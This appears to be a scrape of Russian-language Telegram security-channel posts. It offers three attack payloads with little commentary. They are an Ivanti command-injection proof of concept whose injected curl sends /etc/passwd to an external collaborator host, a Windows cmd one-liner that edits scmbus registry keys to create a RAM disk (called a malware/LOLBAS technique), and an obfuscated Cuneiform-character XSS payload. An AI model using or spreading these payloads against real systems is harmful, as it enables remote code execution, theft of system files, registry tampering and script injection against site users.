Ivanti Decrypt Stored SQL
POC
POC
https :// [ivanti-ip/domain]/api/v1/license/keys-status/;curl -X POST -d @/etc/passwd oastify[.]xxxxx
👍24🔥6😱5
Слишком нестандартный способ создания RAM-диска
Ставит значения в реестр, необходимые для эмуляции RAM-диска, запускает
В общем все malware/LOLBAS-техникс
Ставит значения в реестр, необходимые для эмуляции RAM-диска, запускает
scmbus, а там уже монтирует виртуальный диск в память.В общем все malware/LOLBAS-техникс
cmd /v/k"set A=A&(for /L %i in (1,1,9)do set A=!A!!A!)&set R=reg add HKLM\SYSTEM\CurrentControlSet\Services\scmbus /f /t 3 /v &!R!ForceReadCachedLabels /d C!A!B!A!1&(for %v in (EnableLabelCache CreateSimulatedRamdiskRootDevice RamdiskSizeInBytes)do !R!%v /d DAC5)&sc start scmbus"
🔥21😱9
Ды вы охренели !
XSS payload, Cuneiform-alphabet based
#этопотомучтовывцерковьнеходите
XSS payload, Cuneiform-alphabet based
"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"#этопотомучтовывцерковьнеходите
🔥86😱27👍10